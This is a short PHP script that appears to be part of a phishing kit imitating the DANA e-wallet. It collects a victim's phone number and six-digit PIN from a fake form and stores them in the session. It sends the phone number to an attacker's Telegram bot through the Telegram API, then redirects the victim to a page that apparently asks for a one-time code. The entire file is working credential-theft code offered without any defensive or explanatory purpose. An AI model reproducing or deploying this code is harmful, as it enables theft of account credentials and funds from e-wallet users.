<?php
include "telegram.php";
session_start();
foreach ( $_POST as $key => $value ) { $_SESSION[$key] = $value; }

/////////////////////////////////
$title   = "DANA";
$type     = "PIN";
$href    = "/otp.html";
$nohp = $_SESSION['nohp'];
$pin1 = $_POST['pin1'];
$pin2 = $_POST['pin2'];
$pin3 = $_POST['pin3'];
$pin4 = $_POST['pin4'];
$pin5 = $_POST['pin5'];
$pin6 = $_POST['pin6'];
$pin = $pin1.$pin2.$pin3.$pin4.$pin5.$pin6;
$_SESSION['pin'] = $pin;
$message = "
*( {$title} | {$type} | ".$nohp.")*

- NoHP : `{$_SESSION['nohp']}`
";
/////////////////////////////////


$url = "https://api.telegram.org/bot$id_botTele/sendMessage?parse_mode=markdown&chat_id=$id_telegram&text=" . urlencode($message);
$ch = curl_init();
$optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true);
curl_setopt_array($ch, $optArray);
$result = curl_exec($ch);
curl_close($ch);
header("Location: {$href}");
?>


